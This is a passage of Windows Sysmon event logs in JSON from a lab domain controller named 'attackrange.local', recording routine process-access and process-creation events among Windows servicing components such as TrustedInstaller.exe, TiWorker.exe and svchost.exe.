06:49:04.599","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1180","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-00100B640200}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1079,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.631\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-00100B640200}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.631","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-00100B640200}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1080,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.659\r\nProcessGuid: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nProcessId: 3052\r\nImage: C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nFileVersion: 10.0.14393.3801 (rs1_release.200610-1742)\r\nDescription: Windows Modules Installer Worker\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: TiWorker.exe\r\nCommandLine: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=0CE9C52C23CA8BE3667A9FEFDE41FC15,SHA256=54B3EE99CA831ED9249669FDB9510CAF202F97ED816FA15D4B4791F86760C8E1,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.659","ProcessGuid":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","Image":"C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","FileVersion":"10.0.14393.3801 (rs1_release.200610-1742)","Description":"Windows Modules Installer Worker","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"TiWorker.exe","CommandLine":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=0CE9C52C23CA8BE3667A9FEFDE41FC15,SHA256=54B3EE99CA831ED9249669FDB9510CAF202F97ED816FA15D4B4791F86760C8E1,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1081,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1082,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.662\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.662","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1083,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1084,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.740\r\nSourceProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nSourceProcessId: 3052\r\nSourceThreadId: 1624\r\nSourceImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-00100B640200}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.740","SourceProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","SourceProcessId":"3052","SourceThreadId":"1624","SourceImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-00100B640200}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1085,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.740\r\nSourceProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nSourceProcessId: 3052\r\nSourceThreadId: 1624\r\nSourceImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-00100B640200}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.740","SourceProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","SourceProcessId":"3052","SourceThreadId":"1624","SourceImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-00100B640200}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1086,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.740\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 